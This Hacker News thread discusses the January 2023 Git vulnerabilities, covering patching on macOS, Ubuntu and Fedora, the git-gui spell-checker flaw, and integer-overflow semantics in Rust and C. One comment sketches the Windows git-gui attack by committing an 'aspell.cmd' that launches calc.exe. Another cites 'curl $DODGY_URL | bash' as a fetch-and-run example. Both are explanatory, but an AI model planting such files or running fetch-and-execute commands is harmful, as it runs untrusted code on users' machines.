Git security vulnerabilities announced (github.blog)
387 points by ttaylorr on Jan 17, 2023 | hide | past | favorite | 127 comments



I don't think Apple has patched this yet (it just came out three hours ago). It looks like Homebrew got right on it, so I installed via that with the following command.

`brew install git`

The latest version in Ventura 13.1 seems to be either 2.24.3 or 2.37.1 (not all my co-workers' machines match). I'm not sure if these are defaults, different because some of us have Xcode, or because some of us manually installed. In any case, `brew install` got me up to date.


I too think package managers are amazing...

reads new git security threat

"brew upgrade"

done!


Running brew upgrade uses git, so it has to run the insecure git to upgrade.


Wait until you hear about how your OpenSSL patches get delivered!


Via signed Git tags?

  object 19cc035b6c6f2283573d29c7ea7f7d675cf750ce
  type commit
  tag openssl-3.0.7
  tagger Tomas Mraz <tomas@openssl.org> 1667335515 +0100

  OpenSSL 3.0.7 release tag
  -----BEGIN PGP SIGNATURE-----

  iQJGBAABCAAwFiEE3HAyZir4heL0fyQ/UnRmohynnm0FAmNhhWASHHRvbWFzQG9w
  ZW5zc2wub3JnAAoJEFJ0ZqIcp55tZRkQAJKQ35fUFQ3Wfuj4vbNQNX0Iv/c11q9o
  7Li8A8ananoYhnW9tpVTfpBCHAbE/fvwY3TMCE6IzBsRcjjef1CAqtEEDYI39aEt
  Nr00hUTVQeeH95viYMhmelq6axjkX8dGjfZBufZPJzrKrrj/eZLfmL3A1nZ9yYeF
  MCTxzpcOtaanJQ35h1Ayx3Hj1mcfTixGZR1drlJa5pDoF3y40ysxt/3ZYRD0Z/hO
  NbQ5QK/GPjnBheJaha6X7BoGgMRzXCfVSqtP/hE2Szzdq3nkZbWuDYw8EQ+Nr8Ni
  Q0BIIZLQbTYf4lmTXMbZdgUFq9/vSFNuz2IudDGiHrVfV1HZrZigHly61gqaXhjF
  Uir2LjMEgMr7D4O0udM6RnR7A1Wn3++sc8m3bGHYj+j+oSHSiKpZ0yxKbGY0TITL
  1/vJMBZe46rW2qQi8WI4fkRnyRVc+L19AHqHYeA9XHMWKFgRKgHlf+yf2ysPKsD6
  lGYCFwLJrlec/Sq4mbwe59JwtQbf4LHUQ4k+M1Cr5q04WegMH/nFjOanv8Ehs1Se
  WqJZD/1O+p8Go71g7c8kJ9QYiHkkr/xgs8BF7WMlNw7df5za6V1Ns/VCMSfQ9HF8
  SlODL7NBffQr0A9rGD/AueN2pATzv1p90/Cz5VCIWRfCHMN6EmurdGcSJkSXRbjY
  SDAGDysitYmo
  =/eQF
  -----END PGP SIGNATURE-----


And how, pray tell, are you downloading those signatures? Or the public keys corresponding to them, for that matter, if you don't have them locally already (and, if you do, why do you trust them given that your transport layer has been compromised?)

Besides: if you actually verify `git` signatures, you can count yourself in a club of less than a dozen people who bother. That isn't to say that you're wrong to, just that an optional signature is, to a first approximation, as useful as not signing at all.


The public keys for those signatures have already been downloaded by any vendor who knows what they're doing; a new TLS forgery vulnerability won't really hurt there.

Or, let's put it this way: If you don't bother with the signatures, a TLS forgery likely isn't the easiest way to feed you a fake openssl release, hijacking an account or hacking Github et al are.

Also, Github itself verifies Git signatures, and the maintainers seem to have Github's "vigilant mode" on.


brew repositories are hosted on GitHub. According to the linked article, GitHub did a full scan of all repositories to check whether these attacks were already in use, and implemented mitigations to make it impossible to push such attacks to GitHub. I.e., it should be safe to run brew upgrade.


ugh technically correct, the best type of correct



[Edit: According to @rlpb's comment, git 2.39.1 is already available on Ubuntu]

To install the latest git on Ubuntu:

  sudo apt upgrade git
[Former post included instructions on how to install git from https://launchpad.net/~git-core/+archive/ubuntu/ppa]


> [Edit: According to @rlpb's comment, git 2.39.1 is already available on Ubuntu]

Note that I said Ubuntu's git package was updated, but didn't say to what version. Ubuntu, like most stable distributions, cherry-picks security fixes rather than bumping major versions, so Ubuntu users will get a version with these vulnerabilities patched but not necessarily a bump up to 2.39.1. See https://ubuntu.com/security/notices/USN-5810-1 for details.


Ubuntu will update git, without having to add this.


Indeed! Ubuntu updated git at 18:44Z, nearly an hour before you posted that comment :-)


Hopefully soon :)


> git 2.39.1 is already available on Ubuntu

The updater just gave me 1:2.37.2-1ubuntu1.2 (to replace 1:2.37.2-1ubuntu1.1). It said it addresses the two CVEs in question.

So they (Ubuntu or maybe Debian) are taking the approach of patching a slightly older git version.


I'm not sure why they aren't bumping the patch number; maybe they decided against applying the other parts of the patch to minimize change. But at least the CVEs are mentioned in all of the Ubuntu changelogs.

I can't find anything in the Debian changelogs referring to the CVEs, yet the Ubuntu changelog refers to it as a Debian patch...

Anyone know anything about Debian?



Thank you!


What is git doing with the system’s spell checker? This is the first time I’ve read about git using a spell checker. I know that various gui clients do spell checking, but I’m not aware of git itself doing anything related to this.


As the article states, it's a feature of git-gui, not the git CLI.

The vulnerability is Windows-only, so maybe whatever Windows users do to install git always gives them git-gui. But at least for Linux, the distro might package it separately (mine does), so you won't even have it if you didn't install it.


As best I can tell from the "The Windows-specific issue involves a $PATH lookup including the current working directory" part, it would be:

    echo "calc.exe" > aspell.cmd
    git commit -a -m "lolol windows"
and wait for someone to clone that repo


What I don't quite get is why there's spellchecking on incoming commits at all.


Don't understand what you mean by "incoming commits". git-gui shows you a textbox for the commit message, and error squiggles for misspelled words (presumably; I CBA to install a spell checker). The bug is that it spawns the spellcheck binary using Tcl's API, which on Windows also looks up binaries in the current directory regardless of whether the current directory is in $PATH or not.

Edit: Maybe you're referring to the existing commits in the repo that you just cloned? If so, those are irrelevant. git-gui is a GUI for composing commits. The commit message being spell-checked is the one that you would write in order to create a new commit.


My reason for asking that is that this is the vuln description from the article:

> After cloning a repository, Git GUI automatically applies some post-processing to the resulting checkout, including running a spell-checker, if one is available.

> A Windows-specific vulnerability causes Git GUI to look for the spell-check in the worktree that was just checked out, which may result in running untrusted code.

I get what you're saying that just in general, there's an issue that you could put a file that matches the name for the spellchecker command in the repo and thereby have git-gui run your payload when the spellchecker should run.

But the article says this is "post-processing" to a checkout. That's what doesn't make sense to me, but the CVE itself says the same thing, that aspell is getting run immediately after a clone. What's the point of doing that?


It's phrased badly. I can see that it sounds like it's post-processing the new clone by running spellcheck on all the commits of the cloned branch, but it definitely doesn't do that. I checked the code just to be sure and there's nothing like that in the clone code. (Unless I'm missing something, but as you said I can't fathom why it would need to do that.)

What happens is that, when you use it to clone a repo, it immediately shows the window for authoring a new commit message, which as I said will invoke the spell-check. That's why you are vulnerable from the moment you use git-gui to clone.


I’m pretty sure it’s spell-checking the next commit the user will make, which on a new repository is of course empty, but there's no special case to start the spell-checker only when the user starts writing. (The “post-processing” the article refers to, I think, is just starting up the GUI on the repo, which includes setting up the textbox for the commit message. In fact I’m pretty sure the act of cloning is irrelevant; that’s just the most likely way for an unwitting user to get a malicious repository.)


Regarding the first vulnerability, in git's commit formatting: how can a malicious party exploit it? Someone needs to convince you to run git log with some unusual format specifier, right? And then they need to access some specific memory location this way, so they still need to store something malicious elsewhere. It sounds like it would be extremely hard for anyone to exploit this.

Overall, fixing this looks like routine housekeeping and nothing major.


As stated in the advisory:

> It may also be triggered indirectly via Git’s export-subst mechanism, which applies the formatting modifiers to selected files when using git archive.

This is very practical to exploit on Git forges like GitHub or GitLab, which allow their users to download archives of tags or branches.
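For background, export-subst is driven by a `.gitattributes` entry; here is a minimal benign sketch (the file name `VERSION` is just an example):

```
# .gitattributes — expand $Format:...$ placeholders in VERSION during `git archive`
VERSION export-subst
```

With something like `$Format:%H$` inside `VERSION`, `git archive` (and therefore a forge's tarball download) runs the repository-supplied format string through the same pretty-format machinery, which is why the bug is reachable without anyone typing an unusual `git log` command.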


You could bury it in a script, or in one of the many "copy and paste this command into your terminal" blurbs that we see all over the place.


This sounds like Raymond Chen's "code execution leads to code execution" class of vulnerabilities: if you can trick users into running a malicious script, you have already won.


If you can trick a user to run any arbitrary script blindly, sure, you've already won.

The hard part is tricking a user into running a script that they can inspect, and looks even on close inspection to be non-arbitrary and quite constrained in what it might do.

There's a world of difference between being gullible enough to run `curl $DODGY_URL | bash`, and thinking "what could possibly go wrong" when being asked to check the output of `git log --format="$WEIRD_FORMAT"`. Even if you check that $WEIRD_FORMAT doesn't escape shell quoting and pull a Bobby Tables, or run a `` or $() subshell, or do anything except pass a weird looking format string, there's no way to tell that there's a genuine bug in the `git log` formatting code that allows a specially-crafted format specifier to do ACE.


Pretty narrow vector. Maybe you could target a low-level employee on another team and get them to run it, to exfiltrate info in a high-security environment.


What is the recommended upgrade path for macOS' system install of git?

I have upgraded my brew install, but am unsure of what to do with the vulnerable system install.


I don't think macOS comes with git; like, it might actually come with a git binary, but that binary is just a "shim" that runs an actual copy of git from an installed copy of Xcode. If you want to upgrade what is conceptually that copy of git you can thereby upgrade Xcode. (If you haven't installed Xcode then it might have come from a related package called Xcode Command Line Tools that doesn't include Xcode.app; if you run these shims and don't have Xcode installed it offers to install this package for you automatically.)


I'm guessing a system security update will patch the git executable. No way would apple make you update Xcode just for this. (Well, maybe...)


Sounds terrible, however typically you’re checking out code you’re going to compile and run anyway.


That is a little less than typical for me. I sometimes check out code to read it or to decide if I should compile and run it.


Likewise; editor tooling is better than Github's. In general, I feel like "git checkout" alone being a potentially unsafe action breaks a lot of people's mental threat models.


You might find git-peek useful:

https://github.com/jarred-sumner/git-peek


Both critical bugs are integer overflows. It's unclear to me why our languages still default to modulo arithmetic semantics. I feel Rust had a chance to fix this, but also dropped the ball.


> Rust had a chance to fix this, but also dropped the ball.

By default, a Rust project will panic on integer overflow in debug builds and will overflow on release builds. Two key points to note, however:

1. You can change the setting so that your project panics in release or overflows in debug mode.

2. We reserved the right to change the default at some point in the future. This will probably be widely communicated before it ever happens, and last I heard we are still waiting for the cost of performing those checks to be "reasonable" before thinking about making such a change.
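For reference, that setting lives in the Cargo profile; a minimal sketch:

```toml
# Cargo.toml — opt into panicking on overflow even in release builds
[profile.release]
overflow-checks = true
```

(Similarly, `overflow-checks = false` under `[profile.dev]` would make debug builds wrap.)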


Furthermore, because integer overflow is defined behavior, an overflow is never considered a root cause in Rust. For an integer overflow to express as UB in Rust, you'd have to use it in conjunction with an `unsafe` block that was failing to ensure its invariants, and that block would be considered the root cause. If you're not using `unsafe`, then an integer overflow is at worst a logic bug.


A logic bug can be dangerous too, though. E.g. bumping a user ID to get a "fresh" one, or calculating which port to open based on an offset. When not bounded to a known range, this kind of logic can easily pose a serious security risk. Most of the time it will probably just work, but under extreme conditions it will fail. If your language at least catches the overflow and crashes instead of wrapping around, you "only" have a denial of service.

I can imagine that implementing bounds checking is costly when done in software. I wonder if there are any hardware improvements that could reduce risk in this area.


Indeed, nobody ever said that logic bugs were good, but as a category of flaw it means that integer overflow in Rust isn't particularly interesting compared to all the other innumerable ways to introduce logic bugs. And I say that as someone who wouldn't really mind if the behavior was changed to panic-by-default in release mode.


If you identify an area as risky, it's trivial in Rust to do a checked_add or saturating_add. The challenge is obviously identifying it, but having easy library functions anecdotally leads to people looking for them in code reviews.
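A minimal sketch of those two standard-library methods:

```rust
fn main() {
    // checked_add returns None instead of wrapping on overflow
    assert_eq!(u8::MAX.checked_add(1), None);
    assert_eq!(250u8.checked_add(5), Some(255));

    // saturating_add clamps at the type's bounds instead of wrapping
    assert_eq!(u8::MAX.saturating_add(1), u8::MAX);
    assert_eq!(i8::MIN.saturating_sub(1), i8::MIN);
}
```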


A logic bug can be just as bad as any other kind of bug. Security bugs/memory corruption don't always deserve the extra special treatment they get, nor are they the only kind of remotely exploitable issue.


Just in case people don't know, you can get the same behavior with C or C++ by invoking GCC or Clang with -ftrapv. I don't know about Rust, but for C and C++, -ftrapv will only fault on signed integer overflow, as signed integer overflow is UB in C/C++ but unsigned integer overflow is well defined (it's guaranteed to wrap around modulo 2^N on all platforms). So even if you're trapping on integer overflow, there are still plenty of weird things that can happen if you unintentionally overflow an unsigned integer.


> I heard we are still waiting for the cost of performing those checks to be "reasonable" before thinking about making such a change.

What I don't understand is, checking for integer overflow is extremely cheap in hardware, so why is there any cost for performing those checks? What am I missing?


Part of it is that most CPU architectures don’t make overflow checking as cheap as it could be (there’s no option to trap on overflow, so you need a branch after every arithmetic operation, which has some cost). Another part is the compiler: a lot of compiler optimizations assume that arithmetic is a pure operation that can be added and removed and reordered as needed. So right now, adding overflow checks means opting out of a ton of optimizations. With care it may be possible to recover most of those optimizations, but it would require major improvements to LLVM.


This is a great point. But how about if the language would allow the programmer to specify what range of values is expected for function input/output?

Then a compiler could try to reason about the computation and decide that overflow does not happen if all values are within bounds, and just add checks at the function boundaries.


This would require more checks, not fewer?


Integer arithmetic is a significant part of ~every program. A single branch that checks the overflow flag is not expensive. But branching on that flag every time you do integer math is death by a billion paper cuts.


You could use interrupts, no? Basically free when not triggered, and when triggered you probably don't care about performance anymore.


Most architectures do not provide an interrupt that is generated by an integer overflow. Since this would be a significant architectural change in the hardware, it can't be simply added in.

Additionally, if you are running inside an operating system, handling an interrupt usually incurs a trip through the kernel, which would add extra overhead every time an overflow did happen. Since there's a lot of software which depends on integers overflowing, this overhead on each overflow could significantly impact legacy software.


Using a new instruction, none of that would be an issue. And as someone pointed out, on x86 it wouldn't even be a new instruction; INTO already exists. But apparently it didn't make it into x86-64 because nobody used it :/


x86 at one time had a single-byte instruction that would trap if the overflow bit was set, INTO. It doesn't exist in 64-bit mode, I believe, and it was never widely used as far as I know. The performance implications of adding even a single additional instruction to every integer operation were probably still prohibitive? (And there's a history in x86 of specialized clever instructions and mechanisms going unused, due to being slower than doing the same thing some other way.)


Presumably the program has to check bit in a status register or something like that to tell if the previous instruction caused overflow, no? That means an extra branch after each arithmetic instruction. I imagine that's not cheap?


Fascinating. Haven't had a chance to do Rust yet, but I think I would change this so that they were consistent. I do embedded, and that kind of "behaves differently in different places" is the worst kind of bug to figure out.


> behaves differently in different places

It doesn't behave differently in different places, it differs based on build profile. You test in debug mode, which is where overflows will panic, which makes them quite obvious. If you want to pay the price of overflow checks everywhere in release mode, then you can turn them on there as well (it's not that much of a performance penalty, but that might not be true on embedded...). It's effectively just a compiler flag.


>It's unclear to me why our languages still default to modulo arithmetic semantics.

Because that's what processors do? (leaving aside backwards compatibility issues)


Our processors also require manually manipulating registers.

The whole point of higher level programming languages is to abstract away the fiddly bits of dealing with processors that we don't want to have to deal with.

This is one of those cases.


In this case it's really that, on modern architectures, the cost of determining whether an overflow did or will occur is too high, and the likelihood too low, for it to be reasonable to perform the checks in most cases in native code. It might be different for interpreted languages, depending on a lot of things (whether or not they even use integer arithmetic, whether or not they default to arbitrary-precision integers, etc.). If common architectures automatically interrupted on overflow rather than setting a flag, at no additional cost, I think you'd see safety guarantees instantly.


In cases where you're willing to take the perf hit, you can just use languages like Python which abstract over integer size entirely.


Which used to, but at least for parsing ints they've snuck in the perf hit as a "security vulnerability."


Processors also emit a signal when there's an over/underflow. Is it costly to check that at a low level and terminate the process in this case?


Saturated arithmetic instructions do not do this.


And on the platforms where the ADD instruction uses saturated arithmetic I bet assert(UINT32_MAX + 1 == UINT32_MAX) in C passes.


Unsigned integers in C are defined to wrap on overflow, so they shouldn't be affected by what the underlying processor wants to do. And just because signed overflows are undefined doesn't mean you get what the processor provides either.

So basically, don't forget to test with UBSan.

(I don't like -fno-strict-overflow as a solution, because defining incorrect behavior isn't much better than undefined behavior.)


TIL modulo wrapping for unsigned ints is actually in the standard, I could have sworn it was implementation defined (as opposed to signed wrapping, which is undefined).


Rust does have a fix for this:

  error: this arithmetic operation will overflow
   --> src/main.rs:2:18
    |
  2 |     let a: u64 = u64::MAX + 1;
    |                  ^^^^^^^^^^^^ attempt to compute `u64::MAX + 1_u64`, which would overflow
    |
    = note: `#[deny(arithmetic_overflow)]` on by default
Rust also allows for overflowing arithmetic (preserving the default to fail):

https://doc.rust-lang.org/std/?search=overflowing

It's generally less ergonomic, e.g.

  let (zero, _did_overflow) = u64::MAX.overflowing_add(1);


Slightly related, I wonder why the return type for `overflowing_add` isn't `Result<T>`, but instead a tuple containing a boolean?


There are times when you want to know how much overflow occurred -- think of the way you learn to do multi-digit addition. There is a checked_add that returns an Option<T> if you only care about success/failure.
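A sketch of that use case: the returned bool is exactly the carry you would propagate in multi-digit addition. (The `add128` helper here is hypothetical, built only from standard methods.)

```rust
// Add two 128-bit numbers represented as (low, high) u64 pairs,
// using the overflow flag as the carry between "digits".
fn add128(a: (u64, u64), b: (u64, u64)) -> (u64, u64) {
    let (low, carry) = a.0.overflowing_add(b.0);
    let high = a.1.wrapping_add(b.1).wrapping_add(carry as u64);
    (low, high)
}

fn main() {
    // u64::MAX + 1 in the low word carries into the high word
    assert_eq!(add128((u64::MAX, 0), (1, 0)), (0, 1));
    // The primitive itself returns the wrapped value plus the flag
    assert_eq!(u64::MAX.overflowing_add(1), (0, true));
}
```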


An example is efficient prime-field arithmetic:

https://cp4space.hatsya.com/2021/09/01/an-efficient-prime-fo...

> If A happened to be larger than C, and therefore the result of the subtraction underflowed, then we can correct for this by adding p to the result. [...] we can multiply B by 2^32 using a binary shift and a subtraction, and then add it to the result. We might encounter an overflow, but we can correct for that by subtracting p.

(Highlighting the parts that relate to reacting to overflow.)


My guess is:

The `(T, bool)` that gets returned is friendly towards optimization.

If you don't use the bool, the overflowing arithmetic is reduced to efficient arithmetic which is overflowing by default. If you do use the bool, the generated code contains one extra instruction.


Probably because you'd want to access the value in either case, depending on your application.


Could be a `Result<T, T>` which would seem to express the intent better.


Sometimes, sure. But an overflow doesn't have to be an error, it can be what you're after and you just want to know when it happens.


Binary search is similar and the return type there is already Result<usize, usize>: https://doc.rust-lang.org/std/vec/struct.Vec.html#method.bin...


You'll get a compile error when rustc can statically prove that it'll overflow (as in your example above). That is generally not possible.

The correct answer is what shepmaster said in a sibling comment.


Edit: Gah, I'm a bit wrong too. There's the compiler error (this), and the runtime error (what I'm talking about below.)

Here's a link to the runtime variant: https://play.rust-lang.org/?version=stable&mode=debug&editio...

As a sibling notes, currently, this is for debug builds. So, if you change that playground to "Release", you'll see it wrap.

(I love this feature, and I wish they had done it in release mode too. The sibling comment has some notes on that, too.)

(But, e.g., were `git` written in Rust, presumably the end product would be a release build. Now, you can enable the check there, but that is something you have to do, today.)

(But also note, that, in all cases, it's well-defined. Vs. C, where some overflows are UB.)


Rust makes integer overflow panic in debug builds, so Rust code is effectively required to opt into overflowing operations for correctness reasons. It disables those checks on release builds for performance reasons, but as sibling comments point out, it reserves the right to change that behavior.

Unfortunately, there is a circular dependency here. Languages are reluctant to make integer overflows error conditions because there is a moderately high overhead to checking overflow conditions constantly, and processors (and compilers) are unwilling to make overflow checks cheaper because the benchmarks they care about don't do such checks.


That sounds like the similar but opposite case of tail call optimization. Some languages/compilers don't do it because devs want stack traces. But add TCO, and the code that gets written is quite different from the code written when TCO doesn't exist.

Also, a surprising amount of undefined behavior gets relied on in code. I don't use Rust, but the idea that they could potentially change the future behavior on overflow seems... risky?


I'm wondering if what you are asking for is what Swift does - overflow kills your program, but you can opt into allowing it by using "Overflow Operators" (&+, &- and &*).

This crashes in Swift

   var potentialOverflow = Int16.max
   potentialOverflow += 1

This does not crash

   var potentialOverflow = Int16.max
   potentialOverflow &+= 1

[1] https://docs.swift.org/swift-book/LanguageGuide/AdvancedOper...


As others have mentioned, the default overflow behavior in Rust can be configured to panic. To explicitly wrap around on overflow in every configuration, you can use the newtype wrapper Wrapping, or use the wrapping_add(), wrapping_mul(), etc. methods on the basic integer types. There are also variations such as saturating_op(), checked_op(), and overflowing_op() to detect the overflow and handle it appropriately.
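A quick sketch of the newtype form alongside the per-operation method form (both standard library):

```rust
use std::num::Wrapping;

fn main() {
    // The Wrapping<T> newtype: ordinary +, -, * wrap in every build profile
    let x = Wrapping(u8::MAX) + Wrapping(1);
    assert_eq!(x.0, 0);

    // Method form on the bare integer type, for a single operation
    assert_eq!(u8::MAX.wrapping_mul(2), 254);
}
```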


Sure, I was suggesting that what the OP is asking for is not what Rust does, but what Swift does. This is not a configuration thing, if you don't want a runtime exception on overflow, you must use a different arithmetic operator.

Swift's behavior comes at a cost - it is not exactly the fastest language out there ;) Another no-overflow oddity is that Swift doesn't have a rand() equivalent. You can't get fast pseudorandom numbers in Swift unless you are on the Mac, in which case you can import GameplayKit and get gaming-appropriate pseudorandom numbers.

EDIT - to be clear, I am not suggesting that anyone change their own chosen programming language. But if you'd like, install Swift on your dev machine and make a Swift implementation of the critical section of your Rust code. Debug, optimize, tweak, etc. And you'll get a pretty good idea of what kind of performance you have to give up to do what many people are asking :)


I'm quite paranoid about integer overflows, so in my hobby projects I now have a habit of always using helper functions (which generate an error on overflow) instead of "bare" math operators. Whenever I see a bare math operator without any checks in an open source project (and from what I've seen, almost no one checks for overflows), I wonder whether they thought about the potential consequences, or whether I'm being too paranoid.


My contribution to two open-source projects in recent years has involved a transition to the use of safe arithmetic, too.

I think it makes a lot of sense to think about. Ultimately, it matters more in some applications than in others.


Can you explain this as if I were a programmer who doesn't know what that looks like?


There are different ways to design it, but a simple version could be a function that takes 2 operands and 1 result pointer as inputs, and returns boolean (true if success, false if it overflowed):

    bool SafeAddIntInt(int32_t x, int32_t y, int32_t *r) {
      // GCC and Clang expose a builtin that performs the add and
      // reports whether it overflowed:
      return !__builtin_add_overflow(x, y, r);
    }
so the caller could say

    int32_t result;
    if (SafeAddIntInt(x, y, &result)) {
      // do something with result
    } else {
      // handle overflow
    }
An even simpler version could just abort on over/underflow.


Note that there is no such thing as integer underflow. INT_MIN-1 is an overflow just as much as INT_MAX+1.

Only floats can suffer from underflow, which happens when you want to represent a number whose absolute value is smaller than the floating point precision can allow (e.g. trying to represent 1/2^32 in a 32-bit float).
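A sketch of both points in Rust (method names are standard library; `f32::MIN_POSITIVE` is the smallest positive *normal* f32, ~1.18e-38):

```rust
fn main() {
    // At the integer level, "underflow" is just overflow past the low end:
    assert_eq!(i32::MIN.checked_sub(1), None);

    // Floating-point underflow: a nonzero value smaller than the smallest
    // positive normal becomes subnormal rather than disappearing outright.
    let tiny = f32::MIN_POSITIVE / 2.0;
    assert!(tiny > 0.0 && tiny < f32::MIN_POSITIVE);
    assert!(tiny.is_subnormal());
}
```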


Because saturating math is not "more right", just "different wrong". The "right" way of checking an error condition after every integer operation is prohibitively expensive.

From the language side, what I wish for is a sort of NaN for integer operations. I would not want to check for overflow on every operation, but I would want to know after a couple of them if somewhere an overflow had occurred. On the hardware side this could be done with a sticky overflow bit, which some architectures already support.

I think the ball is on the hardware side and in my opinion Rust did the most sensible thing possible with contemporary hardware.


Integer overflow isn't a security issue unless your program's memory safety depends on the correctness of the integer operation. Safe rust doesn't (in any build mode), but C/C++ does.


> Integer overflow isn't a security issue unless your program's memory safety depends on the correctness of the integer operation.

That's simply not true, and it can have wide-reaching horrible effects. The wrong number of tickets can be purchased from a website, charging for fewer than were purchased. A DNR order can be put in place instead of a save-life order. There are countless security issues that can occur.

Saying that integer overflow is only an issue for memory safety is really bad and incorrect advice.


That's most logic issues, though, is it not? I agree with you, though; I wish Rust more commonly pushed "safer" (not in the UB sense) code, like `Vec::get` and `u32::overflowing_add` etc.

Luckily, lints make it easy to ban the arithmetic/etc. ops from projects. Nevertheless, I feel it should be a bit closer to Rust's home.


Do you have data on the relative frequency and severity of non-memory safety integer overflow security issues?


Here are over 3k CVEs that contain "integer overflow". That shouldn't be considered a comprehensive search.

https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=integer+ove...


You don't need historical stats to show that it can be a security issue.


I know at least about the DAO hack.


To elaborate on this: Rust always performs bounds checks on array accesses, so you can't get an out-of-bound read/write.


Is there a way to turn this off?


Not via a compiler flag, no. The way to "opt out" of bounds checks is to replace `foo[bar]` with `unsafe { foo.get_unchecked(bar) }` at a given callsite. And the use of `unsafe` is going to immediately raise the eyebrow of any code reviewer or auditor.
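A minimal sketch of the three access styles side by side:

```rust
fn main() {
    let v = vec![10, 20, 30];

    // Indexing is bounds-checked: v[3] would panic here,
    // not read out-of-bounds memory.
    assert_eq!(v[2], 30);

    // Non-panicking checked access returns an Option:
    assert_eq!(v.get(3), None);

    // Opting out requires an explicit `unsafe` block (the caller must
    // guarantee the index is in bounds), which stands out in review.
    let second = unsafe { *v.get_unchecked(1) };
    assert_eq!(second, 20);
}
```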


You don't know the business logic of every program. You can't say that a Rust program won't have a security issue due to this.

`UserAccessLevel > Threshold`

Like there could be a million ways an integer becoming small could mess up something.

There are also pure business-logic issues.


Sure, but a logic error is a fundamentally different class of error compared to a memory error. The potential harm of a logic error is limited in scope to what the program was written to be able to do. A memory error can lead to arbitrary code execution.


Logic errors can still be security issues, even if they don't violate memory safety.


Absolutely, and I didn't suggest otherwise. But a logic error generally won't lead to your entire system getting pwned unless the program that has the logic error is one for something like user administration or managing a database etc.


> I feel Rust had a chance to fix this

Don't see how. Given the hardware Rust is designed to program you have to compromise some or all of efficiency, memory usage and complexity to solve overflow.


Rust can guarantee some things about collections which are not possible in C, so a lot more range checks and overflow checks could be omitted. Together with actually having the saturating/overflowing/checked adds, this makes the whole thing a lot safer and easier to deal with where you need to.


Great. Tell bbojan how Rust didn't actually "drop the ball" then. When you do you'll be told about all the different ways Rust doesn't actually solve overflow. And those claims will likely be correct because they're self evident.

My point -- my sole point -- is that Rust is like it is because none of the alternatives are viable for Rust; Rust must run efficiently (as a "systems" level language use defines "efficient") on hardware that silently wraps words. Rust can't fix that and still be Rust. There is no ball to drop.


I wonder if using 64-bit integers all over the place would alleviate this a bit. If your integers represent some real quantities (sizes of objects, etc), the sizes have to be unrealistically huge to trigger an overflow. If your integer is a counter, it would take years to increment it in a tight loop to achieve an overflow.

The cost of operating on 64-bit integers is about the same as operating on 32-bit integers on most modern CPUs (except maybe 32-bit cores in MCUs).


The funniest is how Solidity does this. The language focused on transfers of money.



> url = https://github.com/gitster/git

huh, I would have thought for sure they would have linked to git/git from which that repo was forked

Also, the 2.39.1 tag alleges it was created Dec 13th - I wonder why they held it so long? I would have thought maybe embargo but the actual commit says "security fix" https://github.com/git/git/commit/01443f01b7c6a3c6ef03268b64...


this should really be the article link instead of that proprietary writeup by a company taking advantage of OSS

edit: just because someone puts up an "easy" ""free"" service does not mean they are kind. GitHub is not your friend for git issues. I would hope this site would support true FOSS


No it shouldn't. An hour in, this submission might have had barely 7 points, not 177, and probably a comment or two bemoaning the readability and pointing out the clearer write-up(s) available for people not already keeping up with the mailing list.

If you don't believe me, have a look, this was probably submitted too, and is languishing somewhere off the front page while this one is at the top, by virtue of people voting for it and not the other.


A lack of accessibility/discoverability and a meager focus on looks have been a staple of FOSS for decades, but HN should be a site that helps with this, not one that supports proprietary uses of FOSS software to the benefit of an anti-competitive behemoth such as MS


remirk's link is missing the git-gui CVE so it's not a direct replacement.


I guess GitHub and similar providers could scan incoming commits for these in order to shield users who do not upgrade. We all know there will still be millions of those for years to come.


Seems like there are no updates available for Fedora just yet?


The patched version is in testing https://src.fedoraproject.org/rpms/git


I wonder if there's anyone left at Twitter to backport security fixes to the custom fork of git they use to support their monorepo.


One way to find out!


For those of us who use Homebrew, the patched Git 2.39.1 should be available after this PR is merged:

https://github.com/Homebrew/homebrew-core/pull/120818


PR is now merged


And the update is now a single `brew upgrade` away.


I don't know if "announced" is really the word they want to use here. It makes it sound like they're unveiling a new feature.


Normally these posts would be called advisories (or, more specifically, security advisories).

Some vendors use the term Security Bulletins



